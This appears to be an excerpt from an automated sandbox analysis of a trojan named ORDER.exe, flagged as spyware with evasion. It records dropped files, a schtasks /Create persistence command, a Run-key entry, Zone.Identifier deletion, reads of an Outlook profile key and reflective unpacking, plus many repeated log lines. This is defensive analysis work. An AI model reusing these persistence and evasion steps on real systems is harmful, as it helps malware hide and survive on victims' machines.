                  Source: ORDER.exeBinary or memory string: OriginalFilename, vs ORDER.exe
                  Source: ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: yqoevzHDNPFH.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: kprUEGC.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@18/10@5/2
                  Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Users\user\AppData\Roaming\yqoevzHDNPFH.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeMutant created: \Sessions\1\BaseNamedObjects\YUxgLPKrpvPvPUpXipUEXayi
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_01
                  Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8EFE.tmpJump to behavior
                  Source: ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: ORDER.exeVirustotal: Detection: 70%
                  Source: ORDER.exeReversingLabs: Detection: 72%
                  Source: C:\Users\user\Desktop\ORDER.exeFile read: C:\Users\user\Desktop\ORDER.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\ORDER.exe 'C:\Users\user\Desktop\ORDER.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\Desktop\ORDER.exe {path}
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmpE76F.tmp'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp103F.tmp'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                  Source: C:\Users\user\Desktop\ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp'
                  Source: C:\Users\user\Desktop\ORDER.exeProcess created: C:\Users\user\Desktop\ORDER.exe {path}
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmpE76F.tmp'
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp103F.tmp'
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                  Source: C:\Users\user\Desktop\ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: ORDER.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                  Data Obfuscation:

                  barindex
                  .NET source code contains potential unpackerShow sources
                  Source: ORDER.exe, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: yqoevzHDNPFH.exe.0.dr, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.ORDER.exe.c30000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.ORDER.exe.c30000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: kprUEGC.exe.3.dr, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 3.0.ORDER.exe.d90000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 3.2.ORDER.exe.d90000.1.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 13.2.kprUEGC.exe.670000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 13.0.kprUEGC.exe.670000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.kprUEGC.exe.8a0000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.2.kprUEGC.exe.8a0000.1.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 18.0.kprUEGC.exe.4b0000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 18.2.kprUEGC.exe.4b0000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 22.2.kprUEGC.exe.980000.1.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 22.0.kprUEGC.exe.980000.0.unpack, gFf??K?o??h?/????k??A??Ig?.cs.Net Code: wo??f?Oqpr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_09936636 push es; retf
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_09933665 pushad ; ret
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_0636A61F push es; iretd
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06368513 push es; ret
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06368540 push es; ret
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06758F6B push es; ret
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_0127473A pushad ; retf 8303h
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB6636 push es; retf
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB3665 pushad ; ret
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.8367973888
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.8367973888
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.8367973888
                  Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Users\user\AppData\Roaming\yqoevzHDNPFH.exeJump to dropped file
                  Source: C:\Users\user\Desktop\ORDER.exeFile created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp'
                  Source: C:\Users\user\Desktop\ORDER.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior
                  Source: C:\Users\user\Desktop\ORDER.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\Desktop\ORDER.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
